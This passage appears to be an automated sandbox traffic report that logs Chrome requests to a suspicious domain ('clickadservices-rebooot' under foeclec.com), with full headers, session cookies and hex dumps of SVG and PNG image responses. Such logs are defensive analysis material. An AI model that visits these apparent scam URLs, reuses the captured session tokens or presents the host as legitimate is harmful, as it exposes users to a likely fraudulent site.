                                                                                                                                      2024-05-08 18:12:51 UTC1174INData Raw: 32 34 2e 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d
                                                                                                                                      Data Ascii: 24.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-
                                                                                                                                      2024-05-08 18:12:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      55192.168.2.1649772104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:51 UTC1563OUTGET /wxFxGKaXJ1Sdy5frlO0QjLSY7SGnzx9ErsCrLXZu7niTdftqH1J4qdvt0jG90180 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:51 UTC673INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:51 GMT
                                                                                                                                      Content-Type: image/svg+xml
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="wxFxGKaXJ1Sdy5frlO0QjLSY7SGnzx9ErsCrLXZu7niTdftqH1J4qdvt0jG90180"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=55l5nGBNQ6BCnJbEFLawRCtpmqzYsMjtqJ%2F%2FZvkrVxj1HjDvs2ryQ6BIverdVVTuUjxN6y2%2BDPq4Jrp6U%2BOfVO6ZMEyCNwfxHnaYy%2BHDmmHhrPG1faHq%2FFqQLlrKug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b9c9fa976fa-SEA
                                                                                                                                      2024-05-08 18:12:51 UTC696INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                                                                                                      Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                                                                                                      2024-05-08 18:12:51 UTC1369INData Raw: 41 32 32 2e 32 2c 32 32 2e 32 2c 30 2c 30 2c 31 2c 36 2e 35 38 34 2c 32 32 2e 36 39 2c 31 33 2e 34 38 35 2c 31 33 2e 34 38 35 2c 30 2c 30 2c 31 2c 36 2c 31 38 2e 38 36 36 2c 39 2e 34 35 33 2c 39 2e 34 35 33 2c 30 2c 30 2c 31 2c 36 2e 32 33 35 2c 31 36 2e 36 61 36 2e 32 2c 36 2e 32 2c 30 2c 30 2c 31 2c 2e 37 2d 31 2e 37 30 37 2c 38 2e 38 34 38 2c 38 2e 38 34 38 2c 30 2c 30 2c 31 2c 31 2e 31 34 31 2d 31 2e 34 38 39 71 2e 36 37 39 2d 2e 37 32 33 2c 31 2e 35 38 35 2d 31 2e 36 31 31 61 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2d 2e 37 34 39 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2d 2e 32 36 31 2c 33 2e 33 2c 33 2e 33 2c 30 2c 30 2c 31 2c 31 2e 36 38 31 2e 34 37 2c 38 2e 36 34 38 2c 38 2e 36 34 38 2c
                                                                                                                                      Data Ascii: A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,
                                                                                                                                      2024-05-08 18:12:51 UTC847INData Raw: 34 2d 2e 37 35 38 6c 2d 38 2e 33 30 39 2d 38 2e 33 30 39 61 33 2e 35 32 2c 33 2e 35 32 2c 30 2c 30 2c 31 2d 2e 37 35 38 2d 31 2e 31 32 34 2c 33 2e 33 37 35 2c 33 2e 33 37 35 2c 30 2c 30 2c 31 2d 2e 32 37 2d 31 2e 33 33 33 2c 33 2e 30 36 32 2c 33 2e 30 36 32 2c 30 2c 30 2c 31 2c 2e 32 32 36 2d 31 2e 32 31 31 2c 34 2e 33 31 33 2c 34 2e 33 31 33 2c 30 2c 30 2c 31 2c 2e 35 36 36 2d 2e 39 36 37 2c 36 2e 33 36 34 2c 36 2e 33 36 34 2c 30 2c 30 2c 31 2c 2e 37 33 32 2d 2e 37 39 33 71 2e 33 39 32 2d 2e 33 35 37 2e 37 33 32 2d 2e 36 38 38 61 34 2e 36 37 38 2c 34 2e 36 37 38 2c 30 2c 30 2c 30 2c 2e 35 36 36 2d 2e 36 35 33 2c 31 2e 31 37 35 2c 31 2e 31 37 35 2c 30 2c 30 2c 30 2c 2e 32 32 36 2d 2e 36 38 38 2c 31 2e 33 33 39 2c 31 2e 33 33 39 2c 30 2c 30 2c 30 2d 2e 32
                                                                                                                                      Data Ascii: 4-.758l-8.309-8.309a3.52,3.52,0,0,1-.758-1.124,3.375,3.375,0,0,1-.27-1.333,3.062,3.062,0,0,1,.226-1.211,4.313,4.313,0,0,1,.566-.967,6.364,6.364,0,0,1,.732-.793q.392-.357.732-.688a4.678,4.678,0,0,0,.566-.653,1.175,1.175,0,0,0,.226-.688,1.339,1.339,0,0,0-.2
                                                                                                                                      2024-05-08 18:12:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      56192.168.2.1649777104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:51 UTC1570OUTGET /rsU9Eqel6oXFg542R0Y7uK4Ff2sJKZkM88HuvPqoKUfUqAEELfv1t5GmNJ6cfSy4J0cd200 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:52 UTC678INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:52 GMT
                                                                                                                                      Content-Type: image/svg+xml
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="rsU9Eqel6oXFg542R0Y7uK4Ff2sJKZkM88HuvPqoKUfUqAEELfv1t5GmNJ6cfSy4J0cd200"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0pijX8QKUCFsAnb2X00%2BzxuGomsUWuEjHj5R0tZHm%2BHDgeMxABh0WkHmiToPQT0F8%2BDwDv1G8jTqjmhFAYrC2kgSy5%2B20a7FEn2wHFngVI3mZVkI%2F3uEwQdrFS1Yiw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b9f2cbf9b6b-SEA
                                                                                                                                      2024-05-08 18:12:52 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                                                                                                      Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                                                                                                      2024-05-08 18:12:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      57192.168.2.1649780104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:51 UTC1137OUTGET /qrYOIGH4BKN8SNOJLeflWipzJBhyIs3HEHEROTD45140 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:52 UTC636INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:52 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Content-Length: 727
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="qrYOIGH4BKN8SNOJLeflWipzJBhyIs3HEHEROTD45140"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7H3fqdEOkko%2FdXve7AFAhrtGszTfWXHOcT2MQjYViG2U9gtrWuUfP35Rvlj8s2u%2BFUDojiwuEWu4E4vTCs5noPTQ6gWxXjWk1sRi9yMuW8xSpaW0yf8DO%2BN8BknJAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6ba2c9a130ba-SEA
                                                                                                                                      2024-05-08 18:12:52 UTC727INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b 32 14 5c 00 a2
                                                                                                                                      Data Ascii: PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk2\


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      58192.168.2.1649779104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:52 UTC1561OUTGET /ijFTkgLR5Efre1T29FYi4mZsJ0xy5FLOyx1t1pBM6XxEeSqEaWM6gGZRb12210 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:52 UTC660INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:52 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Content-Length: 49602
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="ijFTkgLR5Efre1T29FYi4mZsJ0xy5FLOyx1t1pBM6XxEeSqEaWM6gGZRb12210"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w1AzlxmNCShGJIdwXJa%2F8CnXM4iv%2BbJdYDatFzaPAlwJ%2FrQ996AiUCL%2Fv0FZTIY0vdF1kv4cwFcepvOQExsMh7uNqftoxISPi4uS%2BnDJqnkCXcsbDbLksDgBiwROzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6ba29e7b75eb-SEA
                                                                                                                                      2024-05-08 18:12:52 UTC709INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                                                                                                                                      Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                                                                                                      2024-05-08 18:12:52 UTC1369INData Raw: 22 49 92 24 49 92 24 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2 d4 63 c0 b9 a4 46 80 41 8b 3c 7a 2a 8b 51 c0 61 c0 15 c0 2b c4 9f 3f d6 fc ba 1b 38 1c 58 6e 91 47 4f 92 24 49 92 24 49 92 24 49 92 82 2c 4f 9a 6c be 81 b4 f5 40 f4 04 ab b5 f8 7a 1e b8 0c d8 8f b4 52 8a ca 61 24 e9 3a ba 1a 98 49 fc 79 62 2d be a6 92 1a 6c f6 c0 95 9e 24 49 92 24 49 92 24 49 92 24 05 db 88 b4 aa c3
                                                                                                                                      Data Ascii: "I$I$I$egG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gscFA<z*Qa+?8XnGO$I$I$I,Ol@zRa$:Iyb-l$I$I$I$
